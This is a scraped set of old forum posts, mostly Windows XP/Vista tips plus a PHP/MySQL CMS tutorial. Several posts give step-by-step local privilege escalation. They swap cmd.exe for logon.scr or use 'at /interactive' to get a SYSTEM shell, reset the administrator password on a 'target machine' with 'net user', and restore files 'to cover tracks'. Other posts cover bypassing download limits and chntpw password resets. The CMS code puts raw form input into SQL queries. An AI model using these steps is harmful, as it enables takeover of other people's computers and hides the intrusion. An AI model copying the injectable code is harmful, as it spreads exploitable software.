|
|
Posted in Computers & Tech / Operating Systems / Windows (All Versions)
Author: BlazeFiend Total-Replies: 13 Ok, here's my problem, me and my older brother share a PC, we're both administrators, but he turned my account into a standard user and wont change it back. So how can I change myself back into an administrator? btw, we hve Windows Vista.
Thu Apr 23, 2009
Reply New Discussion
Posted in Computers & Tech / Operating Systems / Windows (All Versions)
Author: wutske Total-Replies: 45 Don't know if this works, but that links works in IE and you can also make a shortcut to that link. and for those who need admin rights in cmd prompt (you'll need the sheduler service enabled and the rights to do the at command): at xx:xx /interactive cmd.exe where xx:xx is the current time in 24h notation + 1 minute. After 1 minute, a command prompt with 'svchost.exe' in the title bar should apear. Be very carfeull with this because you are now working as 'SYSTEM' wich means you can access, change and delete everything.
Sun May 27, 2007
Reply New Discussion
Posted in Computers & Tech / How-To's and Tutorials / OS / Windows
Author: harriko Total-Replies: 23 In this tutorial i will show ou how to hide your documents or folders, but you have to remember where it is! ok lets go! pick a file you want to hide from windows XP, to help you i will hide a file "hidden.doc" in "C:" open command prompt: START>RUN>CMD you might find yourself in your user directory. in the command prompt go into the directory of where your file is going to be hidden. as my "hidden.doc" is in "C:" i will use "cd.." command to "change directory before" till i get into my C: drive once your there use the attributes command on the file you are hiding. this is what you put into the command prompt. CODEattrib +r +a +s +h hidden.docreplace the hidden.doc with your own file. hope you find this useful!
Tue Feb 15, 2005
Reply New Discussion
Posted in Computers & Tech / How-To's and Tutorials / OS / Windows
Author: CaptainRon Total-Replies: 7 Usually a Windows XP installation is done on a NTFS partition but at times you will find fools who install it on FAT32 partition and have no idea that they could create a Limited user account for normal using and then go about complaining that Windows is insecure to the brim. Anyway here we only need the Windows XP/Server 2003 to be installed on a FAT32 partition. There are three simple steps involved: • Rename the logon.scr file situated in system32 folder to something else. Then make a copy of the cmd.exe and name it logon.scr . • Restart the computer, wait on the logon screen for the renamed cmd.exe to fire up as logon.scr . Usually the time taken will be the time the admin set as the screen saver time. Usually 10 mins, and then you get a console window in front of you with all the admin powers. • Make a useful command. Best thing to do is run the explorer.exe command and wait for the GUI shell to load. Now you can perform normal computer operations. Another good thing that can be done is to change the Administrator password with the NET command on the command line itself. Now we will see how to do the first step in more detail. This can be achieved if u have a simple account or else use a boot disk and from command line you can perform the operation. Or else use a Linux installation to do it. Its always helpful to have a Linux live CD in hand. Else you can use the parallel Win 98 installation to do it (if available). I will elaborate the boot disk method. Most people will be having a Win 98 boot disk or a CD. Boot from it and reach the command line. Suppose Win XP is installed on C:\ then do the following: • A:\> C:\ • C:\> CD Windows\SYSTEM32 • C:\Windows\System32> REN logon.scr logon1.scr • C:\Windows\System32> COPY cmd.exe logon.scr • CTRL+ALT+DELETE (Restart the comp, remove the bootable media) Let see what happens in the second step. You need to do nothing in this step. You just need to sit and wait without pressing any key or moving the mouse for the screen saver to fire up. In this case logon.scr fires up. Logon.scr is nothing but a renamed cmd.exe . A command line shall appear after the set time expires. Now for the hacking step, we have a full powered command line in hand. Now we can do whatever we wish. Lets do one thing first; make sure that we have a long term access to the computer. We will change the administrator password. Type the commad: NET USER Administrator <pass of ur choice> ¿ Very seldom does even a admin log in with the administrator account. So now you have the administrator account in your hand and not many can do anything about it. Supposing the computer is usually used frequently with the admin account, you can simply type the ‘explorer’ command at the shell to call the GUI shell. You get a full power shell in your hand. This is very safe since one will realize that anyone ever hacked their comp. But this will require you to wait for the command line to fire up as a screensaver every time. Anyhow, now you can hack comps of many FAT32 fools.
Mon Jan 9, 2006
Reply New Discussion
Posted in Computers & Tech / Operating Systems / Windows (All Versions)
Author: faulty.lee Total-Replies: 22 Why "[solved]" ??? I'm assuming you're logged into a local machine. If you've logged into a domain machine, then you'll need to get the "human" administrator to help you with that. You need to login as Administrator and configure your right/permission or user type of your account. DISCLAIMER : This is suppose to help you in case you forgot your password or lock yourself out. It's not meant to be use for unlawful act. Do at your down RISK !!! Windows XP installation should come with an Administrator account by default, and normally no password is set. A default user is later create to prevent from using the admin account all the time. With the Welcome Screen, you don't get to login as admin. So you need to switch to safe mode. When booting your PC, press F5, until you see a list of file shown on the screen. When you reach the login screen, try login with "Administrator" without any password. If the above don't help, that means your admin is set with a password. You need to download a tool to do it. chntpw - http://home.eunet.no/pnordahl/ntpasswd/bootdisk.html Download the bootable cd image, then burn into a blank cd. Follow the instruction given on the page. Remember, it's recommended to set the password to blank, you can always change it once you can login. I've used this many time to help myself and to help my client as well. Good Luck
Fri Feb 15, 2008
Reply New Discussion
Posted in Computers & Tech / Security issues & Exploits
Author: XPkiller Total-Replies: 15 QUOTEWINDOWS TIPS COLLECTION How to hack windows XP admin password If you log into a limited account on your target machine and open up a dos prompt then enter this set of commands Exactly: cd\ *drops to root cd\windows\system32 *directs to the system32 dir mkdir temphack *creates the folder temphack copy logon.scr temphack\logon.scr *backsup logon.scr copy cmd.exe temphack\cmd.exe *backsup cmd.exe del logon.scr *deletes original logon.scr rename cmd.exe logon.scr *renames cmd.exe to logon.scr exit *quits dos Now what you have just done is told the computer to backup the command program and the screen saver file, then edits the settings so when the machine boots the screen saver you will get an unprotected dos prompt with out logging into XP. Once this happens if you enter this command minus the quotes "net user <admin account name here> password" If the Administrator Account is called Frank and you want the password blah enter this "net user Frank blah" and this changes the password on franks machine to blah and your in. Have fun p.s: dont forget to copy the contents of temphack back into the system32 dir to cover tracks Registry Hacking Display legal notice on startup: Wanna tell your friends about the do's and dont's in your computer when they login in your absence. Well you can do it pretty easily by displaying a legal notice at system start up. REGEDIT [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system]"legalnoticecaption"="enter your notice caption" "legalnoticetext"="enter your legal notice text" Automatic Administrator Login: Well here's the trick which you can use to prove that Windows XP is not at all secure as multi-user operating system. Hacking the system registry from any account having access to system registry puts you in to the administrator account. REGEDIT 4 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] "AutoAdminLogon"="1" No Shutdown: Wanna play with your friends by removing the shutdown option from start menu in their computer. Just hack it down !!! Regedit HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer "NoClose"="DWORD:1" Menu Delays: Another minor and easy tweak to remove any delay from menus sliding out. For this you will need to use regedit (open regedit by going to Start -> Run..., then typing 'regedit' and pressing enter). The key you need to change is located in HKEY_CURRENT_USERControl PanelDesktop. The actual key is called MenuShowDelay - all you have to do is change the value to 0. Remember, you will have to re-boot your computer for this tweak to take effect. GPEDIT.MSC And Autoplay A great tweaking file that comes with XP is gpedit.msc. Go to Start -> Run... and then type in 'gpedit.msc' and press enter. This is effectively the Policies Editor, and it comes in handy often. For example, if you hate CD autoplay like I do and want to permanently disable it, you can use this tool to do so. Just run gpedit.msc, then go to Computer Configuration -> Administrative Templates -> System. In here you can see the value 'Turn Off Autoplay'. Right-click on it and then click 'Properties'. Increasing options in add/remove programs: Not a fan of MSN Messenger? don't want Windows Media Player on your system? Fair enough, but if you go to Add/Remove Programs in the Control Panel, by default none of Windows XP's 'built in' programs are visible. it's fairly easy to change, though... just open the file X:\Windows\inf\sysoc.inf (where X: is the drive letter where Windows XP is installed) in Notepad. You should see a section of the file something like this: [Components] NtComponents=ntoc.dll,NtOcSetupProc,,4 WBEM=ocgen.dll,OcEntry,wbemoc.inf,hide,7 Display=desk.cpl,DisplayOcSetupProc,,7 Fax=fxsocm.dll,FaxOcmSetupProc,fxsocm.inf,,7 NetOC=netoc.dll,NetOcSetupProc,netoc.inf,,7 iis=iis.dll,OcEntry,iis.inf,,7 com=comsetup.dll,OcEntry,comnt5.inf,hide,7 dtc=msdtcstp.dll,OcEntry,dtcnt5.inf,hide,7 IndexSrv_System = setupqry.dll,IndexSrv,setupqry.inf,,7 TerminalServer=TsOc.dll, HydraOc, TsOc.inf,hide,2 msmq=msmqocm.dll,MsmqOcm,msmqocm.inf,,6 ims=imsinsnt.dll,OcEntry,ims.inf,,7 fp_extensions=fp40ext.dll,FrontPage4Extensions,fp40ext.inf,,7 AutoUpdate=ocgen.dll,OcEntry,au.inf,hide,7 msmsgs=msgrocm.dll,OcEntry,msmsgs.inf,hide,7 RootAutoUpdate=ocgen.dll,OcEntry,rootau.inf,,7 IEAccess=ocgen.dll,OcEntry,ieaccess.inf,,7 This is a list of all components installed at the moment. I've taken the example of MSN Messenger - the program entry called 'msmsgs', third-last line. You can see the word 'hide' highlighted - this is the string which tells Windows not to display the component in the Add/Remove Programs list. Fix this up by simply deleting the word 'hide' like so: msmsgs=msgrocm.dll,OcEntry,msmsgs.inf,hide,7 To this: msmsgs=msgrocm.dll,OcEntry,msmsgs.inf,,7 Now, after restarting, you should be able to see MSN Messenger in the Add/Remove Programs list. If you want to be able to quickly view and remove all components, simply open the sysoc.inf file and do a global find and replace for the word ",hide" and replace it with a single comma ",". Automatically Kill Programs At Shutdown: don't you hate it when, while trying to shut down, you get message boxes telling you that a program is still running? Making it so that Windows automatically kills applications running is a snap. Simply navigate to the HKEY_CURRENT_USERControl PanelDesktop directory in the Registry, then alter the key AutoEndTasks to the value 1. Speeding Up Share Viewing: This is a great tweak. Before I found it, I was always smashing my head against the table waiting to view shares on other computers. Basically, when you connect to another computer with Windows XP, it checks for any Scheduled tasks on that computer - a fairly useless task, but one that can add up to 30 seconds of waiting on the other end - not good! Fortunately, it's fairly easy to disable this process. First, navigate to HKEY_LOCAL_MACHINE/Software/Microsoft/Windows/Current Version/Explorer/RemoteComputer/NameSpace in the Registry. Below that, there should be a key called {D6277990-4C6A-11CF-8D87-00AA0060F5BF}. Just delete this, and after a restart, Windows will no longer check for scheduled tasks - mucho performance improvement! Create a Shortcut to Lock Your Computer Leaving your computer in a hurry but you don’t want to log off? You can double-click a shortcut on your desktop to quickly lock the keyboard and display without using CTRL+ALT+DEL or a screen saver. To create a shortcut on your desktop to lock your computer: Right-click the desktop. Point to New, and then click Shortcut. The Create Shortcut Wizard opens. In the text box, type the following: rundll32.exe user32.dll,LockWorkStation Click Next. Enter a name for the shortcut. You can call it "Lock Workstation" or choose any name you like. Click Finish. You can also change the shortcut's icon (my personal favorite is the padlock icon in shell32.dll). To change the icon: Right click the shortcut and then select Properties. Click the Shortcut tab, and then click the Change Icon button. In the Look for icons in this file text box, type: Shell32.dll. Click OK. Select one of the icons from the list and then click OK You could also give it a shortcut keystroke such CTRL+ALT+L. This would save you only one keystroke from the normal command, but it could be more convenient. Speed up Internet Explorer 6 Favorites For some reason, the Favorites menu in IE 6 seems to slow down dramatically sometimes--I've noticed this happens when you install Tweak UI 1.33, for example, and when you use the preview tip to speed up the Start menu. But here's a fix for the problem that does work, though it's unclear why: Just open a command line window (Start button -> Run -> cmd) and type sfc, then hit ENTER. This command line runs the System File Checker, which performs a number of services, all of which are completely unrelated to IE 6. But there you go: It works. Aspi WinXP does not come with an Aspi layer. So far almost 90% of the problems with WinXP and CD burning software are Aspi layer problems. After installing WinXP, before installing any CD burning software do a few things first: 1. Open up "My computer" and right click on the CD Recorder. If your CD recorder was detected as a CD recorder there will be a tab called "Recording". On this tab uncheck ALL of the boxes. apply or OK out of it and close my computer. 2. Next install the standard Aspi layer for NT. Reboot when asked. That's is. after the reboot you can install any of the currently working CD recording applications with no problems. If using CD Creator do not install direct CD or Take two as they are currently incompatible but Roxio has promised a fix as soon as XP is released.
Sat May 5, 2007
Reply New Discussion
Posted in Computers & Tech / Security issues & Exploits
Author: XPkiller Total-Replies: 13 i found this when i accidently put CMD in my task manager: ________________________________________________________________ To start, lets open up a command prompt (Start > Run > cmd > PRESS ENTER). At the prompt, enter the following command but replace 15:25 with 2 mins after current system time CODEat 15:25 /interactive "cmd.exe"(dont forget to replace 15:25 with 2 minutes after current system time) at the time set a new CMD box will magicaly appear You'll notice that the title bar has changed from cmd.exe to svchost.exe (which is short for Service Host) close the first CMD box but leave svchost open now press CTRL+ALT+DEL, In task manager, go to the processes tab, and kill explorer.exe; your desktop and all open folders should disappear, but the system command prompt should still be there. in the command prompt that remains type explorer.exe A desktop will come back up, but what this? It isn't your desktop. Go to the start menu and look at the user name, it should say "SYSTEM". Also open up task manager again, and you'll notice that explorer.exe is now running as SYSTEM. The easiest way to get back into your own desktop You are now the God of the windows machine Abnormalities & experimentation I've noticed different results depending on the service pack and hot fixes installed; for example, sometimes when I try to open the user control panel applet, I get a error saying user not recognized, and the location where the Local System account profile is stored also varies. I haven't had much time to explore this, so if you find anything else, please use the email address found in the contact section of this article, and send a note my way. A quick fix A way to prevent this from happening at all, would be to make the task scheduler service run under a unprivileged account. You can do this by opening the services control panel (Start > Run > services.msc), and right clicking "Task Scheduler" and going to the Log On tab. Change it to "This Account" and enter the account information you want it to use (has to be an existing account) then restart the service. This may break some programs that use the Task Scheduler and depend on it for SYSTEM access; you have been warned. Otherwise, simple disable the Task Scheduler service.
Sat Apr 28, 2007
Reply New Discussion
Posted in Computers & Tech / Operating Systems / Windows (All Versions)
Author: soleimanian Total-Replies: 21 Command Prompt tips How to change Command Prompt settings You can easily change Windows Command Prompt settings, such as: Font, Font Size, Color, background, Buffer Size and … To change Command Prompt, Right-click the title bar of the command prompt window, and select Properties. Here you can change command prompt settings. How to copy text from a Command Prompt 1-Right-click the title bar of the command prompt window, click Edit> and select Mark. 2- Now, you can select the text you want to copy, just click and drag the cursor to select the text. 3- Right-click the title bar, click Edit> and select Copy. 4- Paste the text on your editor How to open command prompt to a directory You can open a command prompt to a directory that is selected in the Explorer 1- click start > Run > and type “regedit” (without quotes), to run Windows Registry Editor 2- find and go to following “HKEY_CLASSES_ROOT \ Directory \ shell” 3- Create a new key and name “Command”, and give it value of the name you want to appear in the Explorer 4- Under this key create a new key and name “command”, and give it value of cmd.exe /k "cd %L" 5- Now right click on a folder, select Open DOS Box, and a command prompt will open to the selected directory.
Tue Jan 24, 2006
Reply New Discussion
Posted in Computers & Tech / How-To's and Tutorials / Networking
Author: rmdort Total-Replies: 56 I've tried this on both Windows XP and Windows 2000, and it has worked:[/B] 1. Click on "Start" in the bottom left hand corner of screen 2. Click on "Run" 3. Type in "command" and hit ok You should now be at an MSDOS prompt screen. 4. Type "ipconfig /release" just like that, and hit "enter" 5. Type "exit" and leave the prompt 6. Right-click on "Network Places" or "My Network Places" on your desktop. 7. Click on "properties" You should now be on a screen with something titled "Local Area Connection", or something close to that, and, if you have a network hooked up, all of your other networks. 8. Right click on "Local Area Connection" and click "properties" 9. Double-click on the "Internet Protocol (TCP/IP)" from the list under the "General" tab 10. Click on "Use the following IP address" under the "General" tab 11. Create an IP address (It doesn't matter what it is. I just type 1 and 2 until i fill the area up). 12. Press "Tab" and it should automatically fill in the "Subnet Mask" section with default numbers. 13. Hit the "Ok" button here 14. Hit the "Ok" button again You should now be back to the "Local Area Connection" screen.[/B] 15. Right-click back on "Local Area Connection" and go to properties again. 16. Go back to the "TCP/IP" settings 17. This time, select "Obtain an IP address automatically" 18. Hit "Ok" 19. Hit "Ok" again 20. You now have a new IP address With a little practice, you can easily get this process down to 15 seconds. P.S: This only changes your dynamic IP address, not your ISP/IP address.
Fri Nov 19, 2004
New Discussion
Posted in Computers & Tech / Networking
Author: faulty.lee Total-Replies: 30 A very likely chance is that you have IIS install, which comes standard for WinXP, and some installation of other software might have enabled it. Try to check under Services and see if IIS is running, it's name is "IIS Admin" and "World Wide Web Publishing". If so, stop the service, now you should be able to start your apache. If you want to run both concurrently, you need to change the port of either the IIS or the Apache If this doesn't help, or your IIS is not installed, then look under your apache folder, either together with XAMPP, or for my case it's "C:\Program Files\Apache Group\Apache2". Under the logs folder you should see and error.log file. Open that with notepad, there should be some message indicating the problem. For the IIS case, it will show you that port 80 is in used. The Error.og file is a file that you might want to look into once in a while to see if any major problem is creeping in.
Thu Sep 6, 2007
Reply New Discussion
Posted in Computers & Tech / Operating Systems / Windows (All Versions)
Author: FeedBacker Total-Replies: 22 use linux command shell like cygwin How Can I Delete Old Files In Windows Xp ? Install cygwin. Use chown command to change the owner of the file to your new username. Then you can delete it afterwards. -Jason
Sat Feb 9, 2008
Reply New Discussion
Posted in Computers & Tech / How-To's and Tutorials / Programming / PHP
Author: Nqon Total-Replies: 15 This tutorial is for beginners that know some php and know the basics of MySQL. I will tell you how to make a simple Content Managing System. A Content Managing System is a way of editing and adding your content using your browser, so you dont have to go trough ftp all the time. This CMS uses MySQL databases. So what we need to do is to create a database. Well go through this step by step to make it as easy as posible: 1. Go in to your cPanel and select phpMyAdmin. 2. Write the name of your database in the input box under the text: Create new database. This database should be named like this "yourusername_name". So mine would be nqon_cms. With astahost you must have your username first (at least if your being hosted as a subdomain). We will be calling the database "your_database" in this tutorial. Now we need to create a table where all the content should be. It is in this table we add and edit the content. 1. Im assuming your still inside phpMyAdmin, at your left you should now have the name of your database. Click it. 2. You should now get up a text that says: Create new table on database your_database. There you should fill in the name, in this tutorial we'll call it "content". It should have 4 fields 3. The first should look like this(if somethings not specified leave it as it is): First: Field = id | Type = INT | Length/Values = 2 | Extra = auto_increment Second: Field = page | Type = varchar | Length/Values = 20 | Third: Field = tittle | Type = varchar | Length/Values = 30 | Fourth: Field = content | Type = longtext 4. Then press Go or Submit or whatever it says. The first thing that should be done is to connect to the database, this should be in the top of every page (you can use a include() for it if you like, if you dont know what im talking about its not a problem). We'll do it this way: connect to database code CODE<?php/*Change this to your settings*/ $db = "your_database"; $db_user[tab][/tab]= "yourusername"; $db_pass = "yourpassword"; $db_connect = mysql_connect("localhost", $db_user, $db_pass) or die("Could not connect to database."); mysql_select_db($db, $db_connect); ?> You should change your_database to your database name. In my case it would be $db = "nqon_cmd". Username and password should be the same as your cPanel log inn password and username. Now thats done. Its time to make a page so you can add content to the content table you created. We'll call this file addcontent.php. addcontent.php CODE<html><head> <title>Insert Content</title> </head> <body> <?php if(isset($_POST['insertcontent'])) { $page = $_POST['page']; $tittle = $_POST['tittle']; $content = $_POST['content']; [tab][/tab]if(!$page OR !$tittle OR !$content){ echo "Go back and fill out all fields"; } [tab][/tab]else{ $insertcontent = " INSERT INTO content (page, tittle, content) VALUES ('$page', '$tittle', '$content') "; mysql_query($insertcontent) or die("<p><b>A fatal MySQL error occured</b>.\n<br />Query: " . $query . "<br />\nError: (" . mysql_errno() . ") " . mysql_error()); echo "Your new content page was added!"; [tab][/tab]}; } else { echo ?> <form method="post"> <table border="0"><tr><td width="100"> <b>page:</b></td><td> <input type="text" name="page" size="30" maxlength="20" class="textfield" /></td></tr><tr><td> <b>Tittle:</b></td><td> <input type="text" name="tittle" size="30" maxlength="30" class="textfield" /></td></tr><tr><td></table> <p> <b>Content:</b><br> <textarea name="content" rows="14" cols="60"> </textarea> <p> <input name="insertcontent" type="submit" value="Add Content!"/> </center> </form> </td></tr><table> <?php; }; ?> </body> </html> Make sure that you place the "connect to database code" at the very top of this page. Its important that your main page has the page value "main". The page value is how we call the content, you should not have 2 pages with the same page value. Your page value should not have spaces. The tittle value will appear in the <tittle> </tittle> tags. Now we would like to see that content which we just added. So its time to create the index.php page. index.php CODE<?phpif(!isset($page)) { $page="main"; }; $db_query_page = mysql_query("SELECT * FROM content WHERE page='$page' "); $data_page = mysql_fetch_array($db_query_page); $db_query_showlinks = mysql_query("SELECT * FROM content ORDER BY id ASC"); ?> <html> <head> <title> <?php echo $data_page["tittle"]; ?> </title> </head> <body> <table> <tr> <td valign="top"> <?php while($data_showlinks = mysql_fetch_array($db_query_showlinks)){ echo "<a href='/?page="; echo $data_showlinks['page']; echo "'>» "; echo $data_showlinks['page']; echo "</a>"; }; ?> </td> <td valign="top"> <?php echo $data_s["innhold"]; ?> </td> </tr> </table> </body> </html> Here as well you need to insert the connect to database code at the top. Now, you might want to edit the content every once in a while, so its time to work on that file. We'll call that file editcontent.php. editcontent.php CODE<html><head> <title>Edit Content</title> </head> <body> <?php if(isset($_POST['editcontent'])) { $page = $_POST['page']; $tittle = $_POST['tittle']; $content = $_POST['content']; [tab][/tab]if(!$page OR !$tittle OR !$content){ echo "Go back and fill out all fields"; } [tab][/tab]else{ $editcontent = " UPDATE content SET page='$page' tittle='$tittle' content='$content' WHERE id='$id' "; mysql_query($editcontent) or die("<p><b>A fatal MySQL error occured</b>.\n<br />Query: " . $query . "<br />\nError: (" . mysql_errno() . ") " . mysql_error()); echo "The page was succesfully edited!"; [tab][/tab]}; } elseif(isset($_POST['edit'])) { $id= $_POST['edit']; $db_query_edit = mysql_query("SELECT * FROM content WHERE id='$id' "); $data_edit = mysql_fetch_array($db_query_edit); echo ?> <form method="post" action="editcontent.php?id=<?php echo $id; ?>"> <table border="0"><tr><td width="100"> <b>page:</b></td><td> <input type="text" name="page" value="<?php echo $data_edit['page']; ?>" size="30" maxlength="20" class="textfield" /></td></tr><tr><td> <b>Tittle:</b></td><td> <input type="text" name="tittle" value="<?php echo $data_edit['tittle']; ?>"size="30" maxlength="30" class="textfield" /></td></tr><tr><td></table> <p> <b>Content:</b><br> <textarea name="content" rows="14" cols="60"> <?php echo $data_edit['content']; ?></textarea> <p> <center> <input name="editcontent" type="submit" value="Add Content!"/> </center> </form> </td></tr><table> <?php; } else{ $db_query_showlinks = mysql_query("SELECT * FROM innhold ORDER BY id ASC"); ?> <form action="" method="post"> <select name="edit"> <?php while($data_showlinks = mysql_fetch_array($db_query_showlinks)){ echo "<option value='"; echo $data_showlinks['id']; echo "'>"; echo $data_showlinks['page']; echo "</option>"; }; ?> </select> <input type="submit" name="contentedit" value="Edit this page!" /> </form> <?php }; ?> </body> </html> Now Im tired of writing. This should work well, but it might need some final editing first. Im going to make a version of this at my homepage for your viewing pleasure. Its most likely a bit bugged at the moment, but Im going to fix it soon, I just need to rest a bit first. Any feedback is welcome.
Sat May 28, 2005
Reply New Discussion
Posted in Computers & Tech / How-To's and Tutorials / Internet / Internet Browsers
Author: Mopargeek Total-Replies: 9 QUOTEHere are some hints to help you more efficently use rapidshare.Rapidshare has been an excellent tool for sharing large files. Over the last few weeks, many people have figured out how to more efficently use this service. I wanted to document some of these suggestions here. If you have more please let me know. Rapidshare traces the users IP address to limit each user to a certain amount of downloading per day. To get around this, you need to show the rapidshare server, a different IP address. You can do this one of multiple ways. 1. Short-Out the java script: 1. Goto the page you want to download 2. Select FREE button 3. In the address bar put the following: java script:alert(c=0) 4. Click OK 5. Click OK to the pop-up box 6. Enter the captcha 7. Download Your File 2. Request a new IP address from your ISP server. Here's how to do it in windows: 1. Click Start 2. Click run 3. In the run box type cmd.exe and click OK 4. When the command prompt opens type the following. ENTER after each new line. Code: ipconfig /flushdns ipconfig /release ipconfig /renew exit 5. Erase your cookies in whatever browser you are using. 6. Try the rapidshare download again. Frequently you will be assigned a new IP address when this happens. Sometime you will, sometimes you will not. If you are on a fixed IP address, this method will not work. To be honest, I do not know how to do this in linux/unix/etc. If this works for you, you may want to save the above commands into a batch file, and just run it when you need it. 3. Use a proxy with SwitchProxy and Firefox: 1. Download and install Firefox if you have not already 2. Download and install SwitchProxy 3. Google for free proxies 4. When you hit your download limit, clean your cookies and change your proxy 4. Use an anonymous service: Running your system through the tor network should in theory work; however, it is difficult to use and setup. Plus, you allow others to run their evil deeds through your system as well by using this system. Anonymizer 2005 is inexpensive, easy to use, but not free. Other pay services would likely work as well. 5. You can use a bookmarklet to stop your wait times: 1. Open IE 2. Right Click On This Link 3. Select Add to Favorites 4. Select Yes to the warning that the bookmark may be unsafe. 5. Name it "RapidShare No Wait" 6. Click on the Links folder (if you want to display it in your IE toolbar) 7. Click OK 8. You may need to close and reopen IE to see it 9. Goto rapidshare and click the bookmarklet when you are forced to wait This has Been Posted Before On A Different Forum, By The Creator. He Gave Me Full Permission To Post Here, So Mods Please Dont Lock! I wont lock the topic but as discussed you NEED to add quote marks to copied information from other websites... Mark420
Thu May 24, 2007
Reply New Discussion
Posted in Computers & Tech / Operating Systems / Windows (All Versions)
Author: abhiram Total-Replies: 9 Hi, I'm kinda new here so please forgive me if you find this tip lame Now, I've got a lot of stuff on my computer (read pr0n) that I don't want anyone from finding out (esp. my kid brother Method 1: 1. Right click the folder that you want to hide. Select Properties. 2. Click on the 'Customise' tab and select 'Change Icon'. 3. Now select the white space as shown in the picture below: http://www.abhiram.0nyx.com/hide.jpg 4. Select 'OK' and 'Ok' in the properties window. 5. Now you'll only see the name of the folder and no icon. 6. To get rid of the name, right click on the name and then select 'rename'. 7. Now, while keeping the 'alt' button pressed, press 2,5,5 in succession on the NUMERIC KEYPAD. A space will appear in the name space. 8. Press 'ENTER' and that's it! You now have a hidden file right there and no one can see it. Now anyone can realise something fishy when they drag over it and see a small space getting highlighted. So, uncheck 'Auto-arrange icons' from the icons and drag your invisible folder to some corner of the parent folder. Makes it much more difficult to detect. Method 2: This is the method that I usually employ because it can be used to hide files as well as folders. 1. Open the run box with 'win+r' or start>run 2. type in 'cmd' and press 'ENTER' 3. In the console window that opens, type 'cd <complete path to the file>' 4. Type 'attrib +r +h +s +a <filename>' and press 'ENTER'. 5. That's it. Your file is hidden for good. 6. If you want to unhide the file, repeat the steps 1-3 and then type 'attrib -r -h -s -a <filename>'. Ex: If you have a file named "badmovie.avi" in D:\MOVIES, here's what you type after opening the command console: 1. d: (changes the drive letter from c:, the default. to d:) 2. cd movies (folder containing badmovie.avi) 3. attrib +r +h +s +a movies (hide it!) These files are not readily visible. To be able to see them in a folder, you will have to go to Tools>Folder Options>View and select 'Show hidden file types' and also uncheck 'hide protected operating files'. Well, that's my tip for hiding files and folders. I hope someone finds this tip useful. It's what I use all the time
Sat Jul 30, 2005
Reply New Discussion
Posted in Computers & Tech / Operating Systems / Windows (All Versions)
Author: nightfox Total-Replies: 30 Disclaimer from the site: QUOTEDisclaimer: I do not applaud piracy, but I do feel people should have access to their personal files, regardless of whether Windows has expired or not. This tutorial should not be used to bypass Windows Activation, nor does it restore full Windows functionality, but I provide it to those who are in desperate need of accessing files that are suddenly lost to them through the Microsoft Genuine Advantage activation system.[Update: some say it works even better with Vista, as the explorer.exe does not close shortly after you try to open it as it does in XP. Unconfirmed.]
NOTE: I believe that if you don't have internet access (or very limited access like you're charged per minute and you get limited minutes), you can call Microsoft to activate. You'll speak with a Microsoft Licensing person and they'll give you a code to activate Windows. Anyways, here's the tutorial. Remember: I am NOT promoting piracy! Always pay for your software & activate it legally. Personally, I think activation is too harsh and should at least give you access to your files and the ability to transfer them off the machine. http://tomorrowtimes.blogspot.com/2006/12/...ed-windows.html TO THE MODS/ADMINS: I'm sorry if you think this violates the TOS. It's only ment to help those to save files they really need from expired Windows. Microsoft cannot deny access to your files. That's like being locked out of your car simply because you didn't change the oil after 3000 miles... [N]F
Fri Feb 16, 2007
Reply New Discussion
|